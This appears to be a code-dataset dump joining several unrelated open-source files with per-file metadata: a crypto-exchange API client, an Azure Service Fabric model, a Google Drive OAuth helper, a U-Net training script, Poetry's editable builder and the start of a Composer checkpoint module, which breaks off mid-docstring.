timestamp = self.safe_integer(data, 'timestamp')
return self.parse_order_book(data, symbol, timestamp, 'bids', 'asks', 0, 1)
def parse_ticker(self, ticker, market=None):
#
# {
# "pair": "BTCTRY",
# "pairNormalized": "BTC_TRY",
# "timestamp": 1618826361234,
# "last": 462485,
# "high": 473976,
# "low": 444201,
# "bid": 461928,
# "ask": 462485,
# "open": 456915,
# "volume": 917.41368645,
# "average": 462868.29574589,
# "daily": 5570,
# "dailyPercent": 1.22,
# "denominatorSymbol": "TRY",
# "numeratorSymbol": "BTC",
# "order": 1000
# }
#
marketId = self.safe_string(ticker, 'pair')
symbol = self.safe_symbol(marketId, market)
timestamp = self.safe_integer(ticker, 'timestamp')
last = self.safe_number(ticker, 'last')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_number(ticker, 'high'),
'low': self.safe_number(ticker, 'low'),
'bid': self.safe_number(ticker, 'bid'),
'bidVolume': None,
'ask': self.safe_number(ticker, 'ask'),
'askVolume': None,
'vwap': None,
'open': self.safe_number(ticker, 'open'),
'close': last,
'last': last,
'previousClose': None,
'change': self.safe_number(ticker, 'daily'),
'percentage': self.safe_number(ticker, 'dailyPercent'),
'average': self.safe_number(ticker, 'average'),
'baseVolume': self.safe_number(ticker, 'volume'),
'quoteVolume': None,
'info': ticker,
}
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
response = self.publicGetTicker(params)
tickers = self.safe_value(response, 'data')
return self.parse_tickers(tickers, symbols)
def fetch_ticker(self, symbol, params={}):
self.load_markets()
tickers = self.fetch_tickers([symbol], params)
return self.safe_value(tickers, symbol)
def parse_trade(self, trade, market=None):
#
# fetchTrades
# {
# "pair": "BTCUSDT",
# "pairNormalized": "BTC_USDT",
# "numerator": "BTC",
# "denominator": "USDT",
# "date": "1618916879083",
# "tid": "637545136790672520",
# "price": "55774",
# "amount": "0.27917100",
# "side": "buy"
# }
#
# fetchMyTrades
# {
# "price": "56000",
# "numeratorSymbol": "BTC",
# "denominatorSymbol": "USDT",
# "orderType": "buy",
# "orderId": "2606935102",
# "id": "320874372",
# "timestamp": "1618916479593",
# "amount": "0.00020000",
# "fee": "0",
# "tax": "0"
# }
#
timestamp = self.safe_integer_2(trade, 'date', 'timestamp')
id = self.safe_string_2(trade, 'tid', 'id')
order = self.safe_string(trade, 'orderId')
priceString = self.safe_string(trade, 'price')
amountString = Precise.string_abs(self.safe_string(trade, 'amount'))
price = self.parse_number(priceString)
amount = self.parse_number(amountString)
cost = self.parse_number(Precise.string_mul(priceString, amountString))
marketId = self.safe_string(trade, 'pair')
symbol = self.safe_symbol(marketId, market)
side = self.safe_string_2(trade, 'side', 'orderType')
fee = None
feeAmountString = self.safe_string(trade, 'fee')
if feeAmountString is not None:
feeCurrency = self.safe_string(trade, 'denominatorSymbol')
fee = {
'cost': self.parse_number(Precise.string_abs(feeAmountString)),
'currency': self.safe_currency_code(feeCurrency),
}
return {
'info': trade,
'id': id,
'order': order,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': None,
'side': side,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': fee,
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
# maxCount = 50
request = {
'pairSymbol': market['id'],
}
if limit is not None:
request['last'] = limit
response = self.publicGetTrades(self.extend(request, params))
#
# {
# "data": [
# {
# "pair": "BTCTRY",
# "pairNormalized": "BTC_TRY",
# "numerator": "BTC",
# "denominator": "TRY",
# "date": 1618828421497,
# "tid": "637544252214980918",
# "price": "462585.00",
# "amount": "0.01618411",
# "side": "sell"
# }
# ]
# }
#
data = self.safe_value(response, 'data')
return self.parse_trades(data, market, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
# {
# "pair": "BTCTRY",
# "time": 1508284800,
# "open": 20873.689453125,
# "high": 20925.0,
# "low": 19310.0,
# "close": 20679.55078125,
# "volume": 402.216101626982,
# "total": 8103096.44443274,
# "average": 20146.13,
# "dailyChangeAmount": -194.14,
# "dailyChangePercentage": -0.93
# },
return [
self.safe_timestamp(ohlcv, 'time'),
self.safe_number(ohlcv, 'open'),
self.safe_number(ohlcv, 'high'),
self.safe_number(ohlcv, 'low'),
self.safe_number(ohlcv, 'close'),
self.safe_number(ohlcv, 'volume'),
]
def fetch_ohlcv(self, symbol, timeframe='1d', since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
}
if limit is not None:
request['last'] = limit
response = self.graphGetOhlcs(self.extend(request, params))
return self.parse_ohlcvs(response, market, timeframe, since, limit)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'orderType': side,
'orderMethod': type,
'pairSymbol': market['id'],
'quantity': self.amount_to_precision(symbol, amount),
}
if type != 'market':
request['price'] = self.price_to_precision(symbol, price)
if 'clientOrderId' in params:
request['newClientOrderId'] = params['clientOrderId']
elif not ('newClientOrderId' in params):
request['newClientOrderId'] = self.uuid()
response = self.privatePostOrder(self.extend(request, params))
data = self.safe_value(response, 'data')
return self.parse_order(data, market)
def cancel_order(self, id, symbol=None, params={}):
request = {
'id': id,
}
return self.privateDeleteOrder(self.extend(request, params))
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
request = {}
market = None
if symbol is not None:
market = self.market(symbol)
request['pairSymbol'] = market['id']
response = self.privateGetOpenOrders(self.extend(request, params))
data = self.safe_value(response, 'data')
bids = self.safe_value(data, 'bids', [])
asks = self.safe_value(data, 'asks', [])
return self.parse_orders(self.array_concat(bids, asks), market, since, limit)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'pairSymbol': market['id'],
}
if limit is not None:
# default 100 max 1000
request['last'] = limit
if since is not None:
request['startTime'] = int(math.floor(since / 1000))
response = self.privateGetAllOrders(self.extend(request, params))
# {
# "data": [
# {
# "id": "2606012912",
# "price": "55000",
# "amount": "0.0003",
# "quantity": "0.0003",
# "stopPrice": "0",
# "pairSymbol": "BTCUSDT",
# "pairSymbolNormalized": "BTC_USDT",
# "type": "buy",
# "method": "limit",
# "orderClientId": "2ed187bd-59a8-4875-a212-1b793963b85c",
# "time": "1618913189253",
# "updateTime": "1618913189253",
# "status": "Untouched",
# "leftAmount": "0.0003000000000000"
# }
# ]
# }
data = self.safe_value(response, 'data')
return self.parse_orders(data, market, since, limit)
def parse_order_status(self, status):
statuses = {
'Untouched': 'open',
'Partial': 'open',
'Canceled': 'canceled',
'Closed': 'closed',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market):
#
# fetchOrders / fetchOpenOrders
# {
# "id": 2605984008,
# "price": "55000",
# "amount": "0.00050000",
# "quantity": "0.00050000",
# "stopPrice": "0",
# "pairSymbol": "BTCUSDT",
# "pairSymbolNormalized": "BTC_USDT",
# "type": "buy",
# "method": "limit",
# "orderClientId": "f479bdb6-0965-4f03-95b5-daeb7aa5a3a5",
# "time": 0,
# "updateTime": 1618913083543,
# "status": "Untouched",
# "leftAmount": "0.00050000"
# }
#
# createOrder
# {
# "id": "2606935102",
# "quantity": "0.0002",
# "price": "56000",
# "stopPrice": null,
# "newOrderClientId": "98e5c491-7ed9-462b-9666-93553180fb28",
# "type": "buy",
# "method": "limit",
# "pairSymbol": "BTCUSDT",
# "pairSymbolNormalized": "BTC_USDT",
# "datetime": "1618916479523"
# }
#
id = self.safe_string(order, 'id')
priceString = self.safe_string(order, 'price')
precisePrice = Precise(priceString)
price = None
isZero = str(precisePrice) == '0'
if not isZero:
price = self.parse_number(precisePrice)
amountString = self.safe_string(order, 'quantity')
amount = self.parse_number(Precise.string_abs(amountString))
remaining = self.safe_number(order, 'leftAmount')
marketId = self.safe_number(order, 'pairSymbol')
symbol = self.safe_symbol(marketId, market)
side = self.safe_string(order, 'type')
type = self.safe_string(order, 'method')
clientOrderId = self.safe_string(order, 'orderClientId')
timestamp = self.safe_integer_2(order, 'updateTime', 'datetime')
rawStatus = self.safe_string(order, 'status')
status = self.parse_order_status(rawStatus)
return self.safe_order({
'info': order,
'id': id,
'price': price,
'amount': amount,
'remaining': remaining,
'filled': None,
'cost': None,
'average': None,
'status': status,
'side': side,
'type': type,
'clientOrderId': clientOrderId,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'fee': None,
})
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
market = None
if symbol is not None:
market = self.market(symbol)
response = self.privateGetUsersTransactionsTrade()
#
# {
# "data": [
# {
# "price": "56000",
# "numeratorSymbol": "BTC",
# "denominatorSymbol": "USDT",
# "orderType": "buy",
# "orderId": "2606935102",
# "id": "320874372",
# "timestamp": "1618916479593",
# "amount": "0.00020000",
# "fee": "0",
# "tax": "0"
# }
# ],
# "success": True,
# "message": "SUCCESS",
# "code": "0"
# }
#
data = self.safe_value(response, 'data')
return self.parse_trades(data, market, since, limit)
def nonce(self):
return self.milliseconds()
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
if self.id == 'btctrader':
raise ExchangeError(self.id + ' is an abstract base API for BTCExchange, BTCTurk')
url = self.urls['api'][api] + '/' + path
if (method == 'GET') or (method == 'DELETE'):
if params:
url += '?' + self.urlencode(params)
else:
body = self.json(params)
if api == 'private':
self.check_required_credentials()
nonce = str(self.nonce())
secret = self.base64_to_binary(self.secret)
auth = self.apiKey + nonce
headers = {
'X-PCK': self.apiKey,
'X-Stamp': nonce,
'X-Signature': self.hmac(self.encode(auth), secret, hashlib.sha256, 'base64'),
'Content-Type': 'application/json',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
errorCode = self.safe_string(response, 'code', '0')
message = self.safe_string(response, 'message')
output = body if (message is None) else message
self.throw_exactly_matched_exception(self.exceptions['exact'], message, self.id + ' ' + output)
if errorCode != '0':
raise ExchangeError(self.id + ' ' + output)
| 36.601515
| 127
| 0.459867
|
4a0f30fb8a0921c36f784de2a75a6cd9faeac1e2
| 3,509
|
py
|
Python
|
azure-servicefabric/azure/servicefabric/models/stateful_service_info_py3.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2021-09-07T18:36:04.000Z
|
2021-09-07T18:36:04.000Z
|
azure-servicefabric/azure/servicefabric/models/stateful_service_info_py3.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 2
|
2019-10-02T23:37:38.000Z
|
2020-10-02T01:17:31.000Z
|
azure-servicefabric/azure/servicefabric/models/stateful_service_info_py3.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2018-10-16T13:08:23.000Z
|
2018-10-16T13:08:23.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .service_info_py3 import ServiceInfo
class StatefulServiceInfo(ServiceInfo):
"""Information about a stateful Service Fabric service.
All required parameters must be populated in order to send to Azure.
:param id: The identity of the service. This ID is an encoded
representation of the service name. This is used in the REST APIs to
identify the service resource.
Starting in version 6.0, hierarchical names are delimited with the "\\~"
character. For example, if the service name is "fabric:/myapp/app1/svc1",
the service identity would be "myapp~app1\\~svc1" in 6.0+ and
"myapp/app1/svc1" in previous versions.
:type id: str
:param name: The full name of the service with 'fabric:' URI scheme.
:type name: str
:param type_name: Name of the service type as specified in the service
manifest.
:type type_name: str
:param manifest_version: The version of the service manifest.
:type manifest_version: str
:param health_state: The health state of a Service Fabric entity such as
Cluster, Node, Application, Service, Partition, Replica etc. Possible
values include: 'Invalid', 'Ok', 'Warning', 'Error', 'Unknown'
:type health_state: str or ~azure.servicefabric.models.HealthState
:param service_status: The status of the application. Possible values
include: 'Unknown', 'Active', 'Upgrading', 'Deleting', 'Creating',
'Failed'
:type service_status: str or ~azure.servicefabric.models.ServiceStatus
:param is_service_group: Whether the service is in a service group.
:type is_service_group: bool
:param service_kind: Required. Constant filled by server.
:type service_kind: str
:param has_persisted_state: Whether the service has persisted state.
:type has_persisted_state: bool
"""
_validation = {
'service_kind': {'required': True},
}
_attribute_map = {
'id': {'key': 'Id', 'type': 'str'},
'name': {'key': 'Name', 'type': 'str'},
'type_name': {'key': 'TypeName', 'type': 'str'},
'manifest_version': {'key': 'ManifestVersion', 'type': 'str'},
'health_state': {'key': 'HealthState', 'type': 'str'},
'service_status': {'key': 'ServiceStatus', 'type': 'str'},
'is_service_group': {'key': 'IsServiceGroup', 'type': 'bool'},
'service_kind': {'key': 'ServiceKind', 'type': 'str'},
'has_persisted_state': {'key': 'HasPersistedState', 'type': 'bool'},
}
def __init__(self, *, id: str=None, name: str=None, type_name: str=None, manifest_version: str=None, health_state=None, service_status=None, is_service_group: bool=None, has_persisted_state: bool=None, **kwargs) -> None:
super(StatefulServiceInfo, self).__init__(id=id, name=name, type_name=type_name, manifest_version=manifest_version, health_state=health_state, service_status=service_status, is_service_group=is_service_group, **kwargs)
self.has_persisted_state = has_persisted_state
self.service_kind = 'Stateful'
| 49.422535
| 226
| 0.665147
|
4a0f317bc830ca25461e2b8b5a07535336a3a9f7
| 1,645
|
py
|
Python
|
tarbell/oauth.py
|
write-this-way/flask-tarbell
|
0e23e8d90ba66fde1a961ea530c99d94357ff664
|
[
"BSD-3-Clause"
] | 1
|
2016-03-12T21:16:46.000Z
|
2016-03-12T21:16:46.000Z
|
tarbell/oauth.py
|
write-this-way/flask-tarbell
|
0e23e8d90ba66fde1a961ea530c99d94357ff664
|
[
"BSD-3-Clause"
] | null | null | null |
tarbell/oauth.py
|
write-this-way/flask-tarbell
|
0e23e8d90ba66fde1a961ea530c99d94357ff664
|
[
"BSD-3-Clause"
] | null | null | null |
from argparse import ArgumentParser, RawDescriptionHelpFormatter
from oauth2client import client
from oauth2client import keyring_storage
from oauth2client import tools
from apiclient import discovery
import getpass
import httplib2
import os
OAUTH_SCOPE = 'https://www.googleapis.com/auth/drive'
# Force the noauth_local_webserver flag to cover remote operation (e.g.
# using these commands on a server or in a virtual machine.)
parser = ArgumentParser(description=__doc__,
formatter_class=RawDescriptionHelpFormatter,
parents=[tools.argparser])
flags = parser.parse_args(['--noauth_local_webserver'])
def get_drive_api(path, reset_creds=False):
"""
Reads the local client secrets file if available (otherwise, opens a
browser tab to walk through the OAuth 2.0 process, and stores the client
secrets for future use) and then authorizes those credentials. Returns a
Google Drive API service object.
"""
# Retrieve credentials from local storage, if possible
storage = keyring_storage.Storage('tarbell', getpass.getuser())
credentials = None
if not reset_creds:
credentials = storage.get()
if not credentials:
flow = client.flow_from_clientsecrets(os.path.join(path,
'client_secrets.json'),
scope=OAUTH_SCOPE)
credentials = tools.run_flow(flow, storage, flags)
storage.put(credentials)
http = httplib2.Http()
http = credentials.authorize(http)
service = discovery.build('drive', 'v2', http=http)
return service
| 39.166667
| 76
| 0.691793
|
4a0f334b1f7a14f89c533516cdd5bb36c97ed430
| 818
|
gyp
|
Python
|
binding.gyp
|
jkozera/zest-travis-testing
|
9dd106d53ae1e720e4a75eb2ceaaf77ed0d989b1
|
[
"MIT"
] | 268
|
2016-01-13T00:44:54.000Z
|
2022-03-20T12:09:15.000Z
|
binding.gyp
|
jkozera/zest-travis-testing
|
9dd106d53ae1e720e4a75eb2ceaaf77ed0d989b1
|
[
"MIT"
] | 12
|
2016-02-06T11:15:17.000Z
|
2016-04-28T14:33:37.000Z
|
binding.gyp
|
jkozera/zest-travis-testing
|
9dd106d53ae1e720e4a75eb2ceaaf77ed0d989b1
|
[
"MIT"
] | 27
|
2016-02-08T17:43:45.000Z
|
2022-02-22T17:43:50.000Z
|
{
"targets": [
{
"target_name": "nodelucene",
"sources": [ "nodelucene/LuceneIndex.cc" ],
"libraries": [
"-llucene++",
"-llucene++-contrib",
"-L/usr/local/lib",
# for Circle CI:
"-L/home/ubuntu/installprefix/lib/x86_64-linux-gnu",
"-Wl,-rpath,\\$$ORIGIN/resources"
],
"xcode_settings": {
"OTHER_CFLAGS": [
"-std=c++11", "-stdlib=libc++", "-mmacosx-version-min=10.7", "-fexceptions"
],
},
"cflags!": [ "-fno-exceptions", "-fno-rtti" ],
"cflags_cc!": [ "-fno-exceptions", "-fno-rtti" ],
"include_dirs": [
"/usr/local/include/lucene++",
"/usr/local/include",
# for Circle CI:
"/home/ubuntu/installprefix/include/lucene++"
],
}
]
}
| 27.266667
| 85
| 0.48533
|
4a0f33b3a790da4f74a87c6d9d052cd65eca411b
| 3,049
|
py
|
Python
|
5-Image_Segmentation/Unet/train.py
|
haigh1510/TensorFlow2.0-Examples
|
f99fcef22caa2758b5eefce10ee789384345506d
|
[
"MIT"
] | 1,775
|
2019-03-10T02:47:42.000Z
|
2022-03-30T07:22:08.000Z
|
5-Image_Segmentation/Unet/train.py
|
haigh1510/TensorFlow2.0-Examples
|
f99fcef22caa2758b5eefce10ee789384345506d
|
[
"MIT"
] | 128
|
2019-05-07T05:44:10.000Z
|
2022-03-22T11:07:30.000Z
|
5-Image_Segmentation/Unet/train.py
|
haigh1510/TensorFlow2.0-Examples
|
f99fcef22caa2758b5eefce10ee789384345506d
|
[
"MIT"
] | 752
|
2019-03-20T14:14:46.000Z
|
2022-03-22T08:38:36.000Z
|
#! /usr/bin/env python
# coding=utf-8
#================================================================
# Copyright (C) 2019 * Ltd. All rights reserved.
#
# Editor : VIM
# File name : train.py
# Author : YunYang1994
# Created date: 2019-09-19 15:25:10
# Description :
#
#================================================================
import os
import cv2
import numpy as np
from Unet import Unet
from tensorflow.keras.preprocessing.image import ImageDataGenerator
def DataGenerator(file_path, batch_size):
"""
generate image and mask at the same time
use the same seed for image_datagen and mask_datagen
to ensure the transformation for image and mask is the same
"""
aug_dict = dict(rotation_range=0.2,
width_shift_range=0.05,
height_shift_range=0.05,
shear_range=0.05,
zoom_range=0.05,
horizontal_flip=True,
fill_mode='nearest')
aug_dict = dict(horizontal_flip=True,
fill_mode='nearest')
image_datagen = ImageDataGenerator(**aug_dict)
mask_datagen = ImageDataGenerator(**aug_dict)
image_generator = image_datagen.flow_from_directory(
file_path,
classes=["images"],
color_mode = "grayscale",
target_size = (256, 256),
class_mode = None,
batch_size = batch_size, seed=1)
mask_generator = mask_datagen.flow_from_directory(
file_path,
classes=["labels"],
color_mode = "grayscale",
target_size = (256, 256),
class_mode = None,
batch_size = batch_size, seed=1)
train_generator = zip(image_generator, mask_generator)
for (img,mask) in train_generator:
img = img / 255.
mask = mask / 255.
mask[mask > 0.5] = 1
mask[mask <= 0.5] = 0
yield (img,mask)
model = Unet(1, image_size=256)
trainset = DataGenerator("membrane/train", batch_size=2)
model.fit_generator(trainset,steps_per_epoch=5000,epochs=5)
model.save_weights("model.h5")
testSet = DataGenerator("membrane/test", batch_size=1)
alpha = 0.3
model.load_weights("model.h5")
if not os.path.exists("./results"): os.mkdir("./results")
for idx, (img, mask) in enumerate(testSet):
oring_img = img[0]
pred_mask = model.predict(img)[0]
pred_mask[pred_mask > 0.5] = 1
pred_mask[pred_mask <= 0.5] = 0
img = cv2.cvtColor(img[0], cv2.COLOR_GRAY2RGB)
H, W, C = img.shape
for i in range(H):
for j in range(W):
if pred_mask[i][j][0] <= 0.5:
img[i][j] = (1-alpha)*img[i][j]*255 + alpha*np.array([0, 0, 255])
else:
img[i][j] = img[i][j]*255
image_accuracy = np.mean(mask == pred_mask)
image_path = "./results/pred_"+str(idx)+".png"
print("=> accuracy: %.4f, saving %s" %(image_accuracy, image_path))
cv2.imwrite(image_path, img)
cv2.imwrite("./results/origin_%d.png" %idx, oring_img*255)
if idx == 29: break
| 32.784946
| 81
| 0.581174
|
4a0f33b608fd8e17b7dedef87faa3fe377ea72f5
| 9,122
|
py
|
Python
|
poetry/masonry/builders/editable.py
|
HarryPeach/poetry
|
70ac497a81f3ac59ee890c6a7bee0ffc3cae6c6e
|
[
"MIT"
] | null | null | null |
poetry/masonry/builders/editable.py
|
HarryPeach/poetry
|
70ac497a81f3ac59ee890c6a7bee0ffc3cae6c6e
|
[
"MIT"
] | null | null | null |
poetry/masonry/builders/editable.py
|
HarryPeach/poetry
|
70ac497a81f3ac59ee890c6a7bee0ffc3cae6c6e
|
[
"MIT"
] | null | null | null |
import hashlib
import os
import shutil
from base64 import urlsafe_b64encode
from pathlib import Path
from typing import TYPE_CHECKING
from typing import List
from poetry.core.masonry.builders.builder import Builder
from poetry.core.masonry.builders.sdist import SdistBuilder
from poetry.core.masonry.utils.package_include import PackageInclude
from poetry.core.semver.version import Version
from poetry.utils._compat import WINDOWS
from poetry.utils._compat import decode
from poetry.utils.helpers import is_dir_writable
from poetry.utils.pip import pip_editable_install
if TYPE_CHECKING:
from cleo.io.io import IO # noqa
from poetry.core.poetry import Poetry
from poetry.utils.env import Env
SCRIPT_TEMPLATE = """\
#!{python}
from {module} import {callable_holder}
if __name__ == '__main__':
{callable_}()
"""
WINDOWS_CMD_TEMPLATE = """\
@echo off\r\n"{python}" "%~dp0\\{script}" %*\r\n
"""
class EditableBuilder(Builder):
def __init__(self, poetry: "Poetry", env: "Env", io: "IO") -> None:
super().__init__(poetry)
self._env = env
self._io = io
def build(self) -> None:
self._debug(
" - Building package <c1>{}</c1> in <info>editable</info> mode".format(
self._package.name
)
)
if self._package.build_script:
if self._package.build_should_generate_setup():
self._debug(
" - <warning>Falling back on using a <b>setup.py</b></warning>"
)
return self._setup_build()
self._run_build_script(self._package.build_script)
for removed in self._env.site_packages.remove_distribution_files(
distribution_name=self._package.name
):
self._debug(
" - Removed <c2>{}</c2> directory from <b>{}</b>".format(
removed.name, removed.parent
)
)
added_files = []
added_files += self._add_pth()
added_files += self._add_scripts()
self._add_dist_info(added_files)
def _run_build_script(self, build_script: Path) -> None:
self._debug(f" - Executing build script: <b>{build_script}</b>")
self._env.run("python", str(self._path.joinpath(build_script)), call=True)
def _setup_build(self) -> None:
builder = SdistBuilder(self._poetry)
setup = self._path / "setup.py"
has_setup = setup.exists()
if has_setup:
self._io.write_line(
"<warning>A setup.py file already exists. Using it.</warning>"
)
else:
with setup.open("w", encoding="utf-8") as f:
f.write(decode(builder.build_setup()))
try:
if self._env.pip_version < Version.from_parts(19, 0):
pip_editable_install(self._path, self._env)
else:
# Temporarily rename pyproject.toml
shutil.move(
str(self._poetry.file), str(self._poetry.file.with_suffix(".tmp"))
)
try:
pip_editable_install(self._path, self._env)
finally:
shutil.move(
str(self._poetry.file.with_suffix(".tmp")),
str(self._poetry.file),
)
finally:
if not has_setup:
os.remove(str(setup))
def _add_pth(self) -> List[Path]:
paths = set()
for include in self._module.includes:
if isinstance(include, PackageInclude) and (
include.is_module() or include.is_package()
):
paths.add(include.base.resolve().as_posix())
content = ""
for path in paths:
content += decode(path + os.linesep)
pth_file = Path(self._module.name).with_suffix(".pth")
# remove any pre-existing pth files for this package
for file in self._env.site_packages.find(path=pth_file, writable_only=True):
self._debug(
" - Removing existing <c2>{}</c2> from <b>{}</b> for {}".format(
file.name, file.parent, self._poetry.file.parent
)
)
# We can't use unlink(missing_ok=True) because it's not always available
if file.exists():
file.unlink()
try:
pth_file = self._env.site_packages.write_text(
pth_file, content, encoding="utf-8"
)
self._debug(
" - Adding <c2>{}</c2> to <b>{}</b> for {}".format(
pth_file.name, pth_file.parent, self._poetry.file.parent
)
)
return [pth_file]
except OSError:
# TODO: Replace with PermissionError
self._io.write_error_line(
" - Failed to create <c2>{}</c2> for {}".format(
pth_file.name, self._poetry.file.parent
)
)
return []
def _add_scripts(self) -> List[Path]:
added = []
entry_points = self.convert_entry_points()
for scripts_path in self._env.script_dirs:
if is_dir_writable(path=scripts_path, create=True):
break
else:
self._io.write_error_line(
" - Failed to find a suitable script installation directory for {}".format(
self._poetry.file.parent
)
)
return []
scripts = entry_points.get("console_scripts", [])
for script in scripts:
name, script = script.split(" = ")
module, callable_ = script.split(":")
callable_holder = callable_.split(".", 1)[0]
script_file = scripts_path.joinpath(name)
self._debug(
" - Adding the <c2>{}</c2> script to <b>{}</b>".format(
name, scripts_path
)
)
with script_file.open("w", encoding="utf-8") as f:
f.write(
decode(
SCRIPT_TEMPLATE.format(
python=self._env.python,
module=module,
callable_holder=callable_holder,
callable_=callable_,
)
)
)
script_file.chmod(0o755)
added.append(script_file)
if WINDOWS:
cmd_script = script_file.with_suffix(".cmd")
cmd = WINDOWS_CMD_TEMPLATE.format(python=self._env.python, script=name)
self._debug(
" - Adding the <c2>{}</c2> script wrapper to <b>{}</b>".format(
cmd_script.name, scripts_path
)
)
with cmd_script.open("w", encoding="utf-8") as f:
f.write(decode(cmd))
added.append(cmd_script)
return added
def _add_dist_info(self, added_files: List[Path]) -> None:
from poetry.core.masonry.builders.wheel import WheelBuilder
added_files = added_files[:]
builder = WheelBuilder(self._poetry)
dist_info = self._env.site_packages.mkdir(Path(builder.dist_info))
self._debug(
" - Adding the <c2>{}</c2> directory to <b>{}</b>".format(
dist_info.name, dist_info.parent
)
)
with dist_info.joinpath("METADATA").open("w", encoding="utf-8") as f:
builder._write_metadata_file(f)
added_files.append(dist_info.joinpath("METADATA"))
with dist_info.joinpath("INSTALLER").open("w", encoding="utf-8") as f:
f.write("poetry")
added_files.append(dist_info.joinpath("INSTALLER"))
if self.convert_entry_points():
with dist_info.joinpath("entry_points.txt").open(
"w", encoding="utf-8"
) as f:
builder._write_entry_points(f)
added_files.append(dist_info.joinpath("entry_points.txt"))
with dist_info.joinpath("RECORD").open("w", encoding="utf-8") as f:
for path in added_files:
hash = self._get_file_hash(path)
size = path.stat().st_size
f.write("{},sha256={},{}\n".format(str(path), hash, size))
# RECORD itself is recorded with no hash or size
f.write("{},,\n".format(dist_info.joinpath("RECORD")))
def _get_file_hash(self, filepath: Path) -> str:
hashsum = hashlib.sha256()
with filepath.open("rb") as src:
while True:
buf = src.read(1024 * 8)
if not buf:
break
hashsum.update(buf)
src.seek(0)
return urlsafe_b64encode(hashsum.digest()).decode("ascii").rstrip("=")
def _debug(self, msg: str) -> None:
if self._io.is_debug():
self._io.write_line(msg)
| 33.536765
| 92
| 0.539465
|
4a0f3474c5c1d023581cf515d8ab5d1051e221f6
| 23,088
|
py
|
Python
|
composer/utils/checkpoint.py
|
growlix/composer
|
27418a3c65dca26d90ac09c6ae67cbd5d0202ccf
|
[
"Apache-2.0"
] | null | null | null |
composer/utils/checkpoint.py
|
growlix/composer
|
27418a3c65dca26d90ac09c6ae67cbd5d0202ccf
|
[
"Apache-2.0"
] | null | null | null |
composer/utils/checkpoint.py
|
growlix/composer
|
27418a3c65dca26d90ac09c6ae67cbd5d0202ccf
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2022 MosaicML Composer authors
# SPDX-License-Identifier: Apache-2.0
"""Utilities for working with training checkpoints."""
from __future__ import annotations
import contextlib
import fnmatch
import logging
import os
import pathlib
import shutil
import tarfile
import tempfile
import textwrap
import warnings
from typing import TYPE_CHECKING, Any, Callable, Dict, List, Optional, Tuple, Union
import torch
from composer.utils import dist, reproducibility
from composer.utils.file_helpers import (FORMAT_NAME_WITH_DIST_AND_TIME_TABLE, format_name_with_dist_and_time, get_file,
is_tar)
from composer.utils.object_store import ObjectStore
if TYPE_CHECKING:
from composer.core.state import State
from composer.loggers import LoggerDestination
log = logging.getLogger(__name__)
__all__ = ["load_checkpoint", "save_checkpoint"]
_COMPOSER_STATES_FILENAME = "composer_states.pt"
_DEEPSPEED_TAG = "deepspeed" # always tag with the same, deterministic name. We'll rename the tarball to the appropriate name.
def _format_path_with_rank_zero(path: str) -> str:
"""Formats ``path`` with the rank zero values."""
return path.format(
rank=0,
local_rank=0,
node_rank=0,
)
def _format_path_with_current_rank(path: str) -> str:
"""Formats ``path`` formatted with the current rank values."""
return path.format(
rank=dist.get_global_rank(),
local_rank=dist.get_local_rank(),
node_rank=dist.get_node_rank(),
)
def _get_write_mode(name: str) -> str:
"""Get the write mode to use with :func:`tarfile.open`."""
if name.endswith('.tar'):
return 'w'
if name.endswith(".tar.gz") or name.endswith(".tgz"):
return "w:gz"
if name.endswith(".tar.bz2"):
return "w:bz2"
if name.endswith(".tar.lzma"):
return "w:xz"
raise ValueError(f"{name} does not end with a valid tarfile extension.")
def load_checkpoint(
path: str,
state: State,
object_store: Optional[Union[ObjectStore, LoggerDestination]] = None,
load_weights_only: bool = False,
strict_model_weights: bool = False,
progress_bar: bool = True,
ignore_keys: Optional[Union[List[str], Callable[[Dict], None]]] = None,
):
"""Load a checkpoint from a local file, URI, or cloud object store into ``state``.
Args:
path (str): The path format string to an existing checkpoint file.
It can be a path to a file on the local disk, a URL, or if ``object_store`` is set, the object name
for a checkpoint in a cloud bucket.
When using `Deepspeed ZeRO <https://www.deepspeed.ai/tutorials/zero/>`_, checkpoints are shareded by rank.
Instead of hard-coding the rank in the ``path``, use the following format variables:
+------------------------+-------------------------------------------------------+
| Variable | Description |
+========================+=======================================================+
| ``{rank}`` | The global rank, as returned by |
| | :func:`~.dist.get_global_rank`. |
+------------------------+-------------------------------------------------------+
| ``{local_rank}`` | The local rank of the process, as returned by |
| | :func:`~.dist.get_local_rank`. |
+------------------------+-------------------------------------------------------+
| ``{node_rank}`` | The node rank, as returned by |
| | :func:`~.dist.get_node_rank`. |
+------------------------+-------------------------------------------------------+
For example, suppose that checkpoints are stored in the following structure:
.. code-block::
